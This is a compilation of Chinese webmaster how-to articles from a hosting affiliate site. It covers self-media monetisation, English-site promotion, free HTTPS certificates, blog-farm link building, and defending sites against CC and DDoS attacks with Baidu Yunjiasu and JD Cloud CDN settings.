现在网络上有很多跟风的朋友,他看别人写的内容人气很旺,于是就跟风,自己也去写,但是没写几篇就放弃了。为什么?因为他写不出来了,大脑里面没东西,怎么能写出好内容,就算你很会吹牛皮,你写出来的内容也没人看,因为这个领域的精髓、领要你根本不知道,写出来的文章没价值可言,当然就不会有人会持续的关注你,所以就算你写了很多文章,也没什么人看! 4、内容传播 我们创造出来的高质量内容该如何去传播?有些朋友虽然写了很多高质量的内容,却没人来浏览,没人观看,那是因为你的内容还不为人知,我们应该把自己推广出去,前期我们需要用上我们自己能想到的推广方式尽可能的让更多的朋友知道你,当知道你的朋友达到一定数量,那么这些人也会帮你推广,前提是你的内容足够吸引人,他们会主动的转载,帮你传播! 5、持之以恒 前面的4点你都能做好之后你还需要有这个品质,那就是“持之以恒”,其实这四个字是打败绝大多数自媒体人,前面几天大家都兴致勃勃的写文章,做内容,由于自己的懒惰,三天打鱼两天晒网,到后面存活下来的人却没几个,就像卢松松,别人坚持了几年才有今天的成就,你敢说你能做到吗?如果你敢,那你适合做做自媒体,我相信你会成功的! 如果你现在正在策划做一个自媒体,那么上面的内容会对你有一个方向性的指导,而不是盲目的去做,盲目的去做只会导致后面的放弃,这样只会浪费我们宝贵的时间! 接下来我在来和大家分享一下自媒体如何实现盈利! 赚钱,是大部分人坚持写文章坚持分享的最终目的,但是我发现,现在很多朋友虽然写了很多文章,做很多分享,还是没赚钱或者赚钱很少!那是因为你没找到合适的盈利点! 自媒体赚钱模式: 挂广告:出售广告是大部分人选择的赚钱模式,这个模式适合那些流量大的、不容易产品化,服务化的自媒体!现在很多朋友做自媒体都会盲目的选择挂广告,但是我想问下,就你那几百个ip挂广告能赚多少钱?成本都赚不回来吧!但是如果你改变下思维方式,用那几百个ip来卖暴利产品,你的利润会让你吃惊! 卖产品或者服务:这个赚钱模式是我比较支持的模式,因为这个模式可以让你赚大钱,如果做得好赚钱的速度也会超出你的想象,其实自媒体也就是一个打造精准数据库的一个过程,自媒体也就是一个建立信任的媒介,让大家认识你,信任你,再对你的精准数据库做营销,他们购买你的产品会是一个顺理成章的过程!通过卖产品来做自媒体,小流量也可以赚大钱!对于产品这块,可以有很多,可以找人合作、可以找人定制、你自己也可以是产品或者服务! 上面的内容是写给正在盲目写文章的或者打算写文章的你!希望这些文字对你有所帮助,重新思考下你正在做的事情,停下来想想,有时候短暂的停停是更快的进步! #### 如何做英文网站 英文站推广方法 做英文站可不像脑中想象的那样简单,不是简单的把中文文字用yahoo翻译或者Goole翻译工具翻译下就可以了,你需要面对的还有很多,中国人做外国站,最主要的就是语言上的问题,建议大家做好站后先找个外国朋友看看再做下一步工作。不少朋友都说,做英文站的最大问题是域名和空间问题,这只是片面的,真正的问题是英文站的价值,在国外,只有有价值的网站他们才会游览,在他们眼中,访问时间就是金钱。这样,最大的问题也就出来了,怎样做才能获得更多的外国朋友来访问。(这就是我们中国人说的流量问题,有人说做英文站用中国流量,我告诉你,这样做可以,但你的广告费不会有明显的增多,如何最大化提高英文网站流量(策略篇)只有外国的ip点击后获得的广告费才会高点),通过这些天的学习,我就把自己的经验分享给大家吧,内容太多,我就把要点总结下吧:第一:你的英文站必须有准确的制作策略。英文站的设计和制作,必须符合外国人的风格、文化习惯和使用互联网搜索信息的方式,遵照他们的心理去制作,他们见面爱谈天气,你就制作关于天气的内容,切不要把中国的一套东西搬到外国,中国人上qq先问的就是男女,年龄……你不知,外国人最不喜欢别人打听他们的年龄。第二:你的英文站必须能够赢得在互联网上的竞争。(针对企业网站和商务网站)你的产品,各个国家都有可能在生产,都有可能通过网站来赢得潜在顾客。你的网站必须能在竞争中走在前面,要不,你的网站建立的意义就大打折扣。这里所说针对的是企业网站,对于个人网站就是多做国外稀少的类型,外国人对中国不了解,你就做中国武术,他一定不会做,这样你就少了不少竞争对手。第三:你的英文站必须在搜索引擎上面能够被外国人搜索到。如果你的站在google,yahoo,msn里搜索不到,那是多么可怕的一件事情,自己的付出和投资就……所以,你必须优化,由于SEO对我们中国人来说:网站的中文优化都很困难,更别提英文优化。我就介绍个笨方法吧,虽笨却很使用,到各大搜索引擎找到是以com结尾的域名进行提交,(当然,如果你对英文比较精通,顺便找找英国的Google和YaHoo提提交地址及英国常用的搜索引擎进行提交,以此类推,再找其它国家的搜索引擎进行提交)再就是聊天多用msn,多交一些外国朋友,向他们推荐你的网站,让他们帮你宣传,不过前提是你的网站不能太垃圾,这里的垃圾不是指采集站。游览国外论坛,网站留下自己的站址,类似的方法还有很多,我就不一一阐述了。第四:你的英文站必须能帮助你实现自主管理。这里所指的是经常更新,对于国外站,最不方便的就是网站的管理,由于语言上的障碍,我们往往不知道如何管理,这就要你多学习英文了,起码要懂得关于网站,网络常用的一些词汇,有做英文站打算的朋友现在就开始努力学习吧。第五:英文创意设计和美工。每个人都有自己的审美标准,能够适合中国人的网站美工不一定适合美国人、英国人或者澳大利亚人,何况美国人、英国人或者澳大利亚人尽管都说英语,审美标准也不同。必须多游览国外的网站,仿照他们的设计风格来满足大多数人来游览你的网站,虽然这做起来很困难,你要知道,一旦你成功了,所获得的回报也是不同凡响。第六:域名空间的选择。这是最后一点,也是本篇文章最不主要的一点,不少朋友不说也知道,做英文站最好用国际域名(com、net、org)至于用他们中的哪个这不重要,重要的是做好网站的内容,页面,设计出符合他们喜欢的网站,为读者提供由价值的东西。空间,最好用国外空间,在访问速度上有保证。 #### 如何免费申请https域名证书(百度开放云渠道) 现在域名很多网站都启用了https,https的域名具有防劫持,安全加密的功效,同时百度搜索引擎已经明确表示将优先抓取https的页面。所以未来https将是一个大乘势,然而https证书却增加了我们的建站成本,很多https证书是收费,而且很贵,少的几百一年,多的几千一年。 当然提供免费https证书的服务商还是有的,国内腾讯百度都有提供,今天我们来说下如何通过百度申请到免费的https证书。 首先登陆百度开放云后台,选择产品服务,ssl证书服务   选择购买新证书,选择Symantec,选择下一步,支付。(Symantec是全球最大的信息安全服务商。该证书为国内证书服务商TrustAsia(亚洲诚信)联合Symantec为百度云用户专供的证书产品。最主要的是免费!) 完成支付后进入管理控制台,进入域名申请。   输入域名,验证方式选择DNS,文件验证方式比较慢,所以建议用DNS验证方式,其它下面的可以不用填了,然后提交,完成申请。   再返回已购证书列表,点查看申请。   按照相关要求进入相应的域名DNS解析记录,一般是txt解析记录。 完成解析后等待验证通过即可申请成功。   申请成功后记录部署到主机上了,这里主机吧就不多做说明了。 #### 如何关掉鲁大师广告? 不知道大家有没有遇到过,打开浏览器或者打开网页,右下角经常弹出一个漂浮窗口广告,一般都是淘宝广告,聚划算之类的,有时还弹出游戏广告,很是烦人。 一开始主机吧以为是浏览器问题,结果换了几个浏览器还是会经常弹出,后来才知道原来是电脑上安装的鲁大师弹出来的,毕竟是免费软件嘛,如果没广告肯定是没办法盈利的,可以理解。 但该关广告还是得关的,那如何关掉鲁大师的广告呢? 其它很简单,进入软件管理,找到鲁大师,点卸载   但到这里你可能会以为这边是要卸载掉鲁大师,但好戏还在后头,点确定,看下图   点广告太多,关闭广告即可!到这里就可以看出一个套路了,当你要卸载掉这个软件的时候,他就会给你关闭广告权限了! 一个字:贱! #### 如何关闭百度云加速CC的浏览器验证/验证码窗口 问:站长或网站管理员应该如何关闭CC的浏览器验证/验证码窗口? 答: 关于验证码防护:验证码防护是云加速的基础防御规则,当您的网站收到来源于异常IP的异常请求时,系统会自动判定需手动输入验证码,如果您需要解决该问题,可以参考以下解决方案: 1. 将IP加入到IP白名单中。通常触发该防护规则的IP多为可疑IP,如可能历史存在攻击行为等。建议您同时通过云加速报表及服务器日志查看是否存在风险行为,且对于IP的加白,请谨慎处理。 2. 如果开启了CC防护,则根据实际情况调整CC防护的等级,一般为中或低。 3. 如果开启了源站保护,则可根据实际情况调整源站保护的数值,在保证服务器运行正常的情况下,降低验证码出现的概率。 关于5秒浏览器检查:该功能是拦截CC攻击的有效防护措施,5秒是系统在对当前访问的请求进行检测。如果您需要关闭5秒浏览器检查,请登录云加速后台进入安全配置中,将CC防护调整到非强力防护级别即可。 但如果您的网站正处在被攻击状态,请视攻击规模将CC防护调整到强力防护模式,如防护默认为中,在网站受到攻击时,系统也会自动调度。而在攻击状态下,如果您手动将防护级别降低,可能导致部分流量经过节点访问到服务器上,导致服务器并发过高,影响正常用户访问。 #### 如何写文章标题更符合SEO 以下是几个可以帮助你写出更符合SEO的文章标题的技巧: 包含关键词:在标题中包含与文章主题相关的关键词是一个好的做法。这将有助于搜索引擎更好地理解文章内容,并将其与相关搜索结果联系起来。 引人注目:一个好的标题应该能够吸引读者的注意力,并促使他们点击链接来查看更多内容。使用具有情感色彩或反差的字词或短语,或者使用问题或列表格式的标题可以帮助引起读者的兴趣和好奇心。 短而简洁:搜索引擎通常会显示约60个字符长度的标题,因此确保您的标题不超过这个限制可能会更好地吸引读者的注意力。同时保持标题简洁,不要过度复杂或难以理解。 独特性:尽量使用独特的标题,以避免与其他类似主题的文章产生混淆。寻找一些与你的主题不同但仍然相关的话题,这可以帮助你使标题与搜索结果的众多竞争对手分开。 #### 如何判断VPS云服务器可支持网站同时多少人在线? 一般客户经常会考虑这样一个问题,我买个一台服务器,打算在上面部署一套网站,那么我的服务器应该选择多大带宽呢?如何去考虑这个问题呢?如何选择带宽大小才能不至于浪费呢?搞清楚这个问题之前,咱们先看下面这几个概念: B、KB、MB、GB、TB等,虽然计算机也提供对位的判断和操作,但是一般以字节(Byte)为单位。 它们之间的换算关系是1Byte=8bit,1KB=1024B,1MB=1024KB,1GB=1024MB,1TB=1024GB。 1Mbps(1M bits per second)带宽,换算到我们熟悉的文件大小,除以8;也就是说1Mbps带宽,理论下载文件的速率大约是128KB/s。 网站带宽应该如何选择?下面简单说明 忽略网络传输损耗等其他因素,网站所需带宽/8=高峰同时访问数*平均页面大小。平均页面大小就是指网站所有页面的平均尺寸。 举例说明:因为网站访问一般最先打开首页,这里就拿网站首页举例: 假如网站首页页面大小为128K,那1Mbps带宽一个人访问就可以一秒打开;如果首页页面大小为1MB,带宽是1Mbps,1Mb=0.128MB ,意思就是一秒传输数据大小为0.128MB,那么1MB大小的首页,就需要将近8秒左右传输完成。即一个人访问这个网站的首页则需要加载8秒左右。 #### 如何判断云服务器故障了(云服务器故障怎么办) 判断云服务器是否故障了,可以通过以下几个方面进行排查: 无法远程登录:如果您无法通过远程登录方式(例如SSH或远程桌面)访问云服务器,可能是因为服务器故障导致。您可以尝试通过云服务提供商的控制台或管理页面来检查服务器状态或尝试重启服务器。 服务不可用:如果您的应用程序或服务无法正常工作,可能是因为云服务器故障。您可以检查服务器的日志文件或错误日志,查找有关服务器故障的线索。 硬件故障:如果云服务器存在硬件故障,可能会导致服务器无法启动或无法正常工作。您可以检查服务器的硬件组件,例如硬盘、内存和CPU是否正常工作。 网络故障:如果云服务器存在网络故障,可能会导致服务器无法与外部网络通信。您可以使用网络监测工具来检查网络是否正常工作。 系统日志异常:如果服务器故障,可能会在系统日志中留下异常记录。您可以检查系统日志文件,以查看是否存在与服务器故障有关的异常记录。 如果您怀疑云服务器故障,请立即联系您的云服务提供商获取帮助。他们可以提供更详细的故障排除步骤,以及可能需要采取的进一步措施。 #### 如何判断域名是否有价值 判断一个域名是否有价值是一个相对主观的过程,因为它取决于许多因素,例如: 域名长度:一般来说,较短的域名更有价值,因为它们更容易记忆和输入。 域名易于拼写:易于拼写的域名也更有价值,因为它们更容易输入和记忆,而且更不容易出错。 关键词:包含流行关键词的域名通常更有价值,因为它们更容易被搜索引擎索引,也更容易被人们记忆。 拓展名:常见的拓展名(如.com、.net、.org)更受欢迎和认可,因此具有更高的价值。 历史记录:如果一个域名已经有一个长期的、稳定的历史记录,它可能具有更高的价值,因为它可以被视为一个可信、可靠的网站。 流量和收入:如果一个域名已经拥有稳定的流量和收入来源,它可能具有更高的价值。 品牌价值:如果一个域名已经与一个知名品牌相关联,它可能具有更高的价值,因为它可以被视为一个有品牌价值的网站。 综合考虑以上因素可以帮助你判断一个域名是否有价值,当然最终判断还需根据具体情况进行评估。如果你需要更专业的意见,可以咨询专业的域名评估公司。 #### 如何判断是否被CC攻击 什么是CC攻击?CC攻击的前身名为Fatboy攻击,是利用不断对网站发送连接请求致使形成拒绝服务的目的。攻击者通过代理服务器或者肉鸡向向受害主机不停地发大量数据包,造成对方服务器资源耗尽,一直到宕机崩溃。 怎么判断是否被CC攻击? CC攻击主要工作原理是耗资源,这就需要看是那种攻击方式,看抓包分析是否是通过多IP,刷新页面,如果是这是最典型的Cc攻击。如果cc攻击你网站打不开,指定会有一种资源耗尽,才会引发网站打不开或者加载缓慢。可自行判断一下,是下列四种情况中的那一种。 1.CPU耗尽 黑客利用大量肉鸡,刷新你网站动态页面,产生大量并发,导致cpu直接100%,运行在服务器上的网站直接就会出现卡慢,甚至打不开的情况。 2.内存耗尽 黑客大量刷新你网站的动态请求,会产生大量内存,而内存占满就会导致网页打开卡慢等问题。 3. 磁盘IO读写超高 我们都知道每种磁盘的IO读写速率都有限制,像SSD磁盘一般几百MB左右,黑客利用上传下载文件在不停的上传与下载,磁盘资源点满,一但IO占满了,那么正常读写就会无法正常工作,直接导致网站打不开,或者打开超时。 4.耗带宽资源 现在一般的云服务器配置都是5M 10M这样独享带宽,然而这点带宽对于CC攻击来说,简直是蚂蚁撼大象,黑客利用世界各地大量的肉鸡,很轻松就可以打出5G 10G甚至上百G的流量,而一些云服务商对每台云服务器上的带宽都有上限,一但流入流量超过了5G,他们就会直接把这个服务器的IP拉入黑洞,以保证整体网络的稳定性,按我们说的就是拔网线。IP进不去了,网站自然也打不开。 如何防御CC攻击? 理论上服务器配置无限增加就可以防得住CC攻击,CPU内存带宽配置越高,抵抗能力越大,但是这只是理论上的,就好比你是一个身强体壮的汉子,跟一群人打架,三四个人也许对你毫无压力,但是如果几百个人呢?一人一口水你都挂了。 所以防御CC攻击我们需要帮手。 一,高防IP 高防IP是指拥有专业的防火墙的IP转发节点,可以有效拦截非常攻击。就好像一群人肉搏,你却拥有盔甲,对方肯定是打不过你的。 二、高防服务器 和高防IP类似,高防服务器是指拥有专业防火墙的服务器,可以有效拦截CC攻击。 三、高防CDN 高防CDN是指设置在全国各地的高防节点,通过分散攻击来达到防御作用。就像打群架,对方来100人,但是你有15个帮手,而且这些帮手个个都是练武的,一打10不是问题,那么问题就解决了。 三种防御方法主机吧比较推荐高防CDN,因为误杀率低,而且成本也低。比如百度云加速,专业版代理价也才795元一年,非常合算。 #### 如何判断网站是否符合SEO标准 要判断网站是否符合SEO标准,需要分析网站的内容、结构、代码等方面,这个过程可以采用以下方法: 网站结构分析:SEO标准要求网站结构合理,易于搜索引擎抓取和索引。可以使用SEO工具分析网站的结构,包括网站导航、页面布局、URL结构、内部链接等。 内容分析:SEO标准要求网站内容质量高,原创度高,关键词密度适中。可以使用SEO工具分析网站的内容,包括标题、描述、关键词、图片、视频等。 代码分析:SEO标准要求网站代码规范,可读性好,速度快。可以使用SEO工具分析网站的代码,包括HTML、CSS、JavaScript等。 外部链接分析:SEO标准要求网站有高质量的外部链接支持,可以使用SEO工具分析网站的外部链接质量、数量、来源等。 综合以上几个方面的分析结果,可以判断网站是否符合SEO标准。除了使用SEO工具,还可以通过向SEO专家咨询、参考SEO优化教程等方法来了解如何评估网站的SEO状况。 #### 如何判断网站被CC攻击(遭受CC攻击的保护措施) CC(Distributed Denial of Service)攻击是一种常见的网络攻击方式,它会向网站发起大量的请求,使网站无法正常运行。以下是一些可能表明网站被CC攻击的迹象: 网站响应缓慢:如果网站响应缓慢,甚至无法响应,这可能表明网站正在遭受CC攻击。攻击者会向网站发送大量请求,超过网站处理能力,导致网站无法正常响应。 网络流量异常:您可以使用网络监测工具,例如Wireshark、tcpdump等,来检测网站的网络流量是否异常。如果网络流量出现异常,例如大量重复的请求,特定类型的请求或来自特定IP地址的请求,则可能表明网站正在遭受CC攻击。 CPU使用率异常:如果您的服务器的 CPU 使用率异常高,而没有明显的原因,例如正在执行大量的计算或处理任务,这可能表明网站正在遭受CC攻击。攻击者通过向服务器发送大量请求,导致服务器的 CPU 使用率急剧上升。 网络日志异常:您可以检查服务器的日志文件以查看是否有异常的记录。如果您看到大量的连接请求或错误请求,则可能表明网站正在遭受CC攻击。 如果您怀疑网站正在遭受CC攻击,请尽快采取措施来保护您的网站。您可以尝试以下方法: 增加服务器的处理能力:您可以增加服务器的处理能力,例如增加服务器的带宽或CPU,以承受更大的网络流量。 使用CDN:使用CDN(内容分发网络)可以将网站的内容分发到全球的多个节点,分散网络流量,减少对单个服务器的压力。 配置防火墙规则:您可以配置防火墙规则,例如限制单个IP地址的连接数或限制特定类型的请求,以防止CC攻击。 限制访问:如果您知道攻击者的IP地址,请尝试限制其访问您的网站。您可以使用防火墙或其他安全工具来限制IP地址的访问。 #### 如何判断网站被DDOS攻击(DDOS攻击如何防御) DDoS(分布式拒绝服务攻击)是一种常见的网络攻击方式,它会向网站发起大量的请求,使网站无法正常运行。以下是一些可能表明网站被DDoS攻击的迹象: 网站响应缓慢或无法访问:攻击者通过利用大量的计算机发起攻击,向网站发送大量的请求,使其无法正常响应。因此,网站响应缓慢或无法访问可能表明网站正在遭受DDoS攻击。 网络流量异常:您可以使用网络监测工具,例如Wireshark、tcpdump等,来检测网站的网络流量是否异常。如果网络流量出现异常,例如大量重复的请求、特定类型的请求或来自特定IP地址的请求,则可能表明网站正在遭受DDoS攻击。 带宽消耗异常:攻击者会利用大量的计算机向目标网站发送请求,消耗其带宽,导致目标网站无法正常工作。因此,如果您发现您的网站的带宽消耗异常高,而没有明显的原因,可能表明您的网站正在遭受DDoS攻击。 CPU使用率异常:攻击者通过向服务器发送大量请求,导致服务器的CPU使用率急剧上升。因此,如果您的服务器的CPU使用率异常高,而没有明显的原因,可能表明您的网站正在遭受DDoS攻击。 网络日志异常:您可以检查服务器的日志文件以查看是否有异常的记录。如果您看到大量的连接请求或错误请求,则可能表明您的网站正在遭受DDoS攻击。 如果您怀疑您的网站正在遭受DDoS攻击,请尽快采取措施来保护您的网站。您可以尝试以下方法: 使用高防CDN:使用高防CDN(内容分发网络)可以将网站的内容分发到全球的多个节点,分散网络流量,减少对单个服务器的压力,同时节点具有一定的防御能力,提攻击成本。 增加服务器的处理能力:您可以增加服务器的处理能力,例如增加服务器的带宽或CPU,以承受更大的网络流量。 配置云防火墙:您可以配置云防火墙规则,例如限制单个IP地址的连接数或限制特定类型的请求,以防止DDoS攻击。 限制访问:如果您知道攻击者的IP地址,请尝试限制其访问您的网站。或者通过防火墙限制某一个地区、国家的网络访问,以达到减少攻击的目的。 主机吧推荐使用高防CDN来进行防御DDOS攻击: 百度云加速 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。 优惠链接https://zhujib.com/yunjiasu.html 京东云星盾SCDN 京东云星盾SCDN安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 优惠链接:https://zhujib.com/jdxingdun.html #### 如何利用FTP软件上传网站源码到虚拟主机 FTP上传网站源码很简单,但有些新手还是不会,这里主机吧做个教程教大家如何操作。 首先我们下载FTP软件: http://downinfo.myhostadmin.net/FlashFXP.zip 运行FlashFXP.exe安装,选择快速连接,输入FTP地址与帐户密码   虚拟主机帐户密码在我司的官网会员中心--虚拟主机管理--查看详情(要上传的虚拟主机)可以看到 查看详情 查看FTP 在FTP软件输入虚拟主机的FTP资料连接 连接成功后把要上传的源码上传WWW目录里(华夏名网默认是WWW目录,其它空间商的可能不同) #### 如何利用FTP软件代理功能连接空间上传文件 经常用用户FTP连不上的,可能是本地网络无法连接空间IP,这个时候我们就需要用到FTP代理功能。 若您不会设置:http://downinfo.myhostadmin.net/FlashFXP.zip 可以下载此配置好的软件,解压以后直接连接选择代理服务器使用。 一、LeapFTP使用设置 LeapFTP 下载地址:http://downinfo.myhostadmin.net/ha_leapftp273600_yy.rar (如果您习惯使用FlashFXP上传,请访问:http://www.myhostadmin.net/vhost/help-proxy.asp ) 首先打开LeapFTP 2.7.3.600 软件,点击“选项”—“参数设置”—“常规”,如图: 然后点击“代理”,勾选“使用代理”,主机地址填写:proxy2.vhostgo.com,(若这个地址慢,可以换主机地址:proxy.vhostgo.com 试试,移动线路尝试:proxy3.vhostgo.com),端口填写:2121,用户名和密码留空,下边选择“USER user@host:port”,在使用安全(pasv)前面打上勾,  然后点击确定即可。 如图: 最后回到软件界面,填写您的FTP主机地址、FTP账号和密码连接上传就可以了,如下图: 二、CuteFTP 软件设置代理: 打开CuteFTP V8.3.4软件,点击“编辑”—“设置”—“连接”—“防火墙”,如图: 1、主机地址填写:proxy2.vhostgo.com,(若这个地址慢,可以换主机地址:proxy.vhostgo.com 试试),端口填写:2121,用户名和密码留空,下边选择“USER user@site”,在使用安全(pasv)前面打上勾,  然后点击确定即可。 2、点击“文件”--“站点管理器”,选择您的站点--“编辑(E)”,在“设置"选项,勾选 使用PASV模式(P)和使用防火墙设置(F)确定,最后点击“连接(C)”即可使用代理连接。 #### 如何利用京东云星盾SCDN拦截某个IP段的IP 接到一位站长反馈,自家网站经常受到同一个IP段的IP频繁访问,问要如何进行屏蔽? 这里主机吧教大家一个方法: 1.进入京东云SCDN控制台-安全规则-防火墙规则  2.创建防火墙规则 3.规则如下: 规则描述:屏蔽IP段 字段:IP地址 运算符:包含以下各项 值:填写要拦截的IP段,如116.179.33.0/24 操作:阻止 4.确认后,即可正常拦截该IP段的IP访问,效果如下: #### 如何利用代码实现手机访问自动跳转移动适应网页   很多时候电脑访问很好看的页面,如果放到手机上访问,体验就会很差,所以为了适应移动设备访问的体验,往往需要针对移动设置做一个网页。 当移动设备访问PC端页面时,利用js代码语句判断识别,自动跳转到相应的页面。 <script language="javascript"> //平台、设备和操作系统 var system ={ win : false, mac : false, xll : false }; //检测平台 var p = navigator.platform; system.win = p.indexOf("Win") == 0; system.mac = p.indexOf("Mac") == 0; system.x11 = (p == "X11") || (p.indexOf("Linux") == 0); if(system.win||system.mac||system.xll){ }else{ window.location.href="http://www.ssjfpx.com/3g-mxjf"; } //此处网址可手动修改为想跳转到的网址 </script> 将此段代码拷贝到head之间 也可以将其作为js文件,然后head调用即可 #### 如何利用博客群建推广网站带来流量和外链操作方法 首选说一下什么是博客群建,它是指建立大量的第三方平台博客,通过这些博客发布更新内容,扩大产品和品牌宣传面,并从搜索引擎处获得流量和外链。 笔者刚进入网络推广行业时也是从群建博客推广开始的。这种推广方法比较受新手的欢迎,它相对简单、容易操作,只要能够认真的坚持,效果都还是不错的。 下图是我负责的网站师库网博客群建推广的效果及数据 1、百度搜索网站名称第一页博客数量及排名情况   一共有三个博客,搜狐博客、和讯博客、天涯博客,其中天涯博客有两个进入第一页。 2、下图为一周内博客带个网站流量: 博客群每周能给网站带来至少500pv,350ip。虽然不是很多,这还是淡季的数据,如果每逢旺季,每周的流量至少翻3倍以上。 下面分享一下我做是如何操作博客群建推广的: 一、博客群建及平台选择 博客群建,就是多建立博客。具体需要建立多少博客,这个需要根据个人的精力和时间来定,当然是越多越好。以我自己的经验至少在5个以上效果才会比较明显。 在选择建立博客的平台时一定要选择比较知名的、搜索引擎权重高的博客,这样的博客做起来才会容易一些;一些本身就没什么权重的博客平台就不用考虑了,本身就没有权重,做起来可以说是事倍功半。 根据经验比较不错的平台有百度、新浪、搜狐、网易、天涯、和讯、QQ空间,这些博客的网站权高、流量大、搜索引索抓取率高,是合适做博客群建推广的平台。当然如果是行业性比较强的,可以找一下行业内比较知名的博客平台。 二、博客的简单定位 博客的定位,由于是群建博客,主要目的是提产品和品牌高曝光率、引流量和增加外链;博客的定位可以相对简单一些。可以根据产品的种类、产品特性、用户的需求等进行定位。比如笔者负责的网站是做基础教育产品的包括课件、教案、试卷等,我就建立是三个博客分别以课件、教案、试卷为主题。我们的产品又分为年级和学科,我又建立的不少博客将主要年级和学科作为主题。 博客定位的同时要注意博客的名称,根据定位为每个博客取一个好的名字,最好能考虑一下seo融入关键词。不要把博客名称搞得一看就像是广告,这种博客首先用户一看到名称就不想进来看了,其次也容易被封。 三、内容的更新 博客群建内容更新方面是一个不小的难题。由于博客多,更新量必然就会很大。一般情况是每个博客每天最好能更新2-5篇文章。只有每天更新,才能吸引搜索引擎。 虽然说是博客群建,但内容也不能很差,全都是广告信息。如果身网站的更新量比较大,可以随着网站更新而更新,博客更新内容加上原网站链接(对于权重不是很高的网站,最好在网站内容被收录后在转载到博客,这样是为了防止搜索引擎将博客的内容当成是原创,网站本身内容为复制转载)。转载的时候也要注意转载一些优质的、与博客主题相关内容,如果能经常写一些原创文章那就最好不过了。 四、博客圈的建立 各个博客之间也不能是孤立的,基本上所有博客都有友情链接模块,可将这些博客相互链接起来,形成一个博客圈。最后将所有博客都链接指向要推广的网站。 平时多进行相互的点击,这个也不需要特意去进行,在更新的时候,你可以直接从一个博客的友情链接进入另一个博客,也就达到了相互点击的效果。 五、坚持才会有成效 不管做什么都是要坚持的,做推广更是需要坚持,博客群建立起来并不会马上出效果,坚持更新维护,一般3个月能出效果,六个月能稳定。博客群建还有个好处就是养出一批资源,如果你能认真做,能养出几个权重高的博客,不但对现在的推广有很大促进作用,而且也是一笔非常丰厚的资源,以后如何要推广相关内的网站,一个链接、一篇文章就能起到很大的作用了。   #### 如何利用百度云加速CC防火墙防御大规模CC攻击 百度云加速是防御CC攻击是老手了,市面上90%的CC攻击百度云加速都是可以防得住的,今天刚好遇到一位被大规模CC攻击的网站,我们来教大家如何防御攻击超亿的CC攻击。 首先得买个百度云加速商务版,条件好的买企业版,大规模攻击不适用专业版。 然后接入使用cname接入百度云加速,进入安全功能-ADS- CC防护 ,开启强力防护模式,这个非常重要,因为量大的CC攻击只有这个模式管用。 安全功能-ADS- 停用海外节点:开启   海外IP防护 :开启  不建议开启超级清洗,测试对付大量CC攻击防御能力并没有普通节点防御好。  进入安全功能-WAF,  Web应用防火墙 :开启    安全验证有效期:5分钟(大规模攻击需要) 浏览器检查:开启    尽可能让防火墙拦截更多IP 减少服务器压力 进入CDN功能,缓存粒度设:简单  智能压缩:勾选JS、CSS、HTML  最大上传文件大小 :选最大      图片自动压缩 :有损压缩     这样操作是为了尽量减少回源的请求,减少流量   做完以上操作后,我们再想办法把海外请求屏蔽掉。 在百度云加速添加子域名,线路选海外,指向IP乱写一个,反正不是你的源服务器IP就行,这样一但百度识别访问者IP是海外的,那么就会回源请求你乱写的IP服务器上,达到访问不了的目的,同时也减少服务器压力。 最后,利用域名DNS解析屏蔽掉海外IP访问,尽可能减少海外访问的可能性。完成这一切,效果基本都是不错的,比如主机吧今天这位客户,目前已经拦截了8亿次的CC攻击了。 #### 如何利用百度云加速CDN缓存加速m3u8格式视频 经常有站长想利用百度云加速CDN缓存加速视频文件,不过百度云加速默认是不会缓存视频文件的,百度云加速默认缓存以下格式文件: css/js/jpg/jpeg/gif/ico/png/bmp/pict/csv/doc/pdf/pls/ppt/tif/tiff/eps/ejs/swf/ midi/mid/ttf/eot/woff/otf/svg/svgz/webp/docx/xlsx/xls/pptx/ps/class/jar 如果你要缓存的文件格式并不在以上行列中,那么自行做特定页面规则,功能域名 查看报表下拉-特定页面规则 假如我要缓存.m3u8格式视频文件,那么输入你的域名/*.m3u8,如下图: 其中*符号是代表通配符,也就是以上输入法表示不管zhujib.com/1.m3u8还是zhujib.com/1995a.m3u8都在缓存加速行列 其次缓存粒度一定要用所有都缓存,否则系统只会对默认格式缓存。 节点缓存有效期,如果不经常更新的话尽量选时间长些,这样可以节省回源次数,从而减少源服务器压力。 其它的默认选项默认就好了,然后提交规则即可缓存域名下的所有.m3u8格式视频文件。 #### 如何利用百度云加速做http301重定向跳转https 百度云加速一直是主机吧主推的不错的产品之一,价格便宜,防护好,性价比非常高。主机吧代理分销百度云加速以来,一直很受欢迎,有需要的朋友可以找我哈。今天我们来学习如何利百度云加速做http301重定向跳转https地址上。首先进入百度云加速官网控制面板,我的网站,找到设置跳转的网站,点查看报表后面的下拉,进入规则自定义 然后开启跳转输入跳转域名, 比如我要做全站http跳转到https,那么我输入zhujib.com/*跳转到https://zhujib.com/$1 可视为对当前www子域名下的路径进行通配跳转。其他路径可沿用该类写法进行配置。好了 设置完成,提交,再刷新下缓存即可生效。 #### 如何利用百度云加速给网站全站缓存 什么是全站缓存?全站缓存就是把网页的所有内容都缓存到百度云加速一定的时间,使客户访问只需要直接请求云加速节点即可,而不需要再请求源站。 为何要做全站缓存呢?因为全站缓存可以减少访问回源,从而减大大减轻源服务器压力,还可以大大提供网页访问速度。可以说用全站缓存来防CC攻击是不错的选择。 全站缓存有什么缺点?缺点是网页缓存后如果网页有会员登陆、发布文章这类动态请求的,是会影响其功能的正常使用。所以一般像论坛这类的程序是不适合全站缓存的。 如何设置全站缓存呢? 首先我们进入查看报表下拉-规则自定义 添加URL:输入你的域名/* 比如主机吧域名zhujib.com/*     *是通配符 缓存粒度设置:所有都缓存(这个很重要一定要选这个) 节点缓存有效期:一般设置4小时 浏览器缓存有效期:8小时 其它默认即可。 选完后我们记得要提交 弄完这一切后,等10分钟全站就自动缓存了。 如果我们要登陆后台更新内容怎么办?很简单,设置后台地址不缓存即可,比如主机吧后台是zhujib.com/wp-admin/ ,那么添加一条zhujib.com/wp-admin/*的规则 记住缓存粒度设置要设置:不缓存 